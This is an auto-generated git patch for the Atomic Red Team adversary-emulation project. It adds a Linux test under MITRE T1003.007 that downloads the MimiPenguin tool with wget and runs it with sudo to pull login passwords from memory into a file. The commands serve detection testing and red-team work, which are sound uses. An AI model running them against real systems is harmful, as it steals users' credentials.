From 82df99e7c8addd8620d5ecbb1ca38b594bd28d8f Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 9 Mar 2022 16:16:04 +0000 Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/linux-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/linux-index.md | 1 + atomics/Indexes/index.yaml | 67 +++++++++++++++ atomics/T1003.007/T1003.007.md | 85 +++++++++++++++++++ 6 files changed, 156 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 1e582b39..0a6f7538 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -102,6 +102,7 @@ credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption cer credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh +credential-access,T1003.007,Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash credential-access,T1606.002,SAML Tokens,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index 437ccce7..525ea1fa 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -27,6 +27,7 @@ credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864b credential-access,T1552.004,Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh +credential-access,T1003.007,Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash credential-access,T1606.002,SAML Tokens,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index f6f7eabc..253ca895 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -146,6 +146,7 @@ - [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md) - Atomic Test #1: Dump individual process memory with sh (Local) [linux] - Atomic Test #2: Dump individual process memory with Python (Local) [linux] + - Atomic Test #3: Capture Passwords with MimiPenguin [linux] - [T1606.002 SAML Tokens](../../T1606.002/T1606.002.md) - Atomic Test #1: Golden SAML [azure-ad] - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md) diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 130436db..a467540a 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -54,6 +54,7 @@ - [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md) - Atomic Test #1: Dump individual process memory with sh (Local) [linux] - Atomic Test #2: Dump individual process memory with Python (Local) [linux] + - Atomic Test #3: Capture Passwords with MimiPenguin [linux] - [T1606.002 SAML Tokens](../../T1606.002/T1606.002.md) - Atomic Test #1: Golden SAML [azure-ad] - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index e1077627..26376790 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -6299,6 +6299,73 @@ credential-access: cleanup_command: 'rm -f "#{output_file}" ' + - name: Capture Passwords with MimiPenguin + auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c + description: "MimiPenguin is a tool inspired by MimiKatz that targets Linux + systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions + of GNOME Keyring). \nUpon successful execution on an affected system, MimiPenguin + will retrieve passwords from memory and output them to a specified file. \nSee + https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. \nSee https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.\n" + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: "/tmp/T1003.007Test3.txt" + MimiPenguin_Location: + description: Path of MimiPenguin script + type: Path + default: "/tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh" + dependency_executor_name: sh + dependencies: + - description: 'MimiPenguin script must exist on disk at specified location + (#{MimiPenguin_Location}) + +' + prereq_command: 'if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: | + wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz + mkdir /tmp/mimipenguin + tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin + - description: 'Strings must be installed + +' + prereq_command: 'if [ -x "$(command -v strings --version)" ]; then exit 0; + else exit 1; fi; + +' + get_prereq_command: 'sudo apt-get -y install binutils + +' + - description: 'Python2 must be installed + +' + prereq_command: 'if [ -x "$(command -v python2 --version)" ]; then exit 0; + else exit 1; fi; + +' + get_prereq_command: "sudo apt-get -y install python2 \n" + - description: 'Libc-bin must be installed + +' + prereq_command: 'if [ -x "$(command -v ldd --version)" ]; then exit 0; else + exit 1; fi; + +' + get_prereq_command: "sudo apt-get -y install libc-bin \n" + executor: + command: | + sudo #{MimiPenguin_Location} > #{output_file} + cat #{output_file} + cleanup_command: 'rm -f #{output_file} > /dev/null + +' + name: bash + elevation_required: true T1606.002: technique: external_references: diff --git a/atomics/T1003.007/T1003.007.md b/atomics/T1003.007/T1003.007.md index d2d5875d..c07b000b 100644 --- a/atomics/T1003.007/T1003.007.md +++ b/atomics/T1003.007/T1003.007.md @@ -10,6 +10,8 @@ This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin - [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local) +- [Atomic Test #3 - Capture Passwords with MimiPenguin](#atomic-test-3---capture-passwords-with-mimipenguin) +
@@ -139,4 +141,87 @@ echo "Python 2.7+ or 3.4+ must be installed" +
+
+ +## Atomic Test #3 - Capture Passwords with MimiPenguin +MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). +Upon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. +See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. +See https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions. + +**Supported Platforms:** Linux + + +**auto_generated_guid:** a27418de-bdce-4ebd-b655-38f04842bf0c + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed | Path | /tmp/T1003.007Test3.txt| +| MimiPenguin_Location | Path of MimiPenguin script | Path | /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh| + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +sudo #{MimiPenguin_Location} > #{output_file} +cat #{output_file} +``` + +#### Cleanup Commands: +```bash +rm -f #{output_file} > /dev/null +``` + + + +#### Dependencies: Run with `sh`! +##### Description: MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location}) +##### Check Prereq Commands: +```sh +if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit 1; fi; +``` +##### Get Prereq Commands: +```sh +wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz +mkdir /tmp/mimipenguin +tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin +``` +##### Description: Strings must be installed +##### Check Prereq Commands: +```sh +if [ -x "$(command -v strings --version)" ]; then exit 0; else exit 1; fi; +``` +##### Get Prereq Commands: +```sh +sudo apt-get -y install binutils +``` +##### Description: Python2 must be installed +##### Check Prereq Commands: +```sh +if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi; +``` +##### Get Prereq Commands: +```sh +sudo apt-get -y install python2 +``` +##### Description: Libc-bin must be installed +##### Check Prereq Commands: +```sh +if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi; +``` +##### Get Prereq Commands: +```sh +sudo apt-get -y install libc-bin +``` + + + +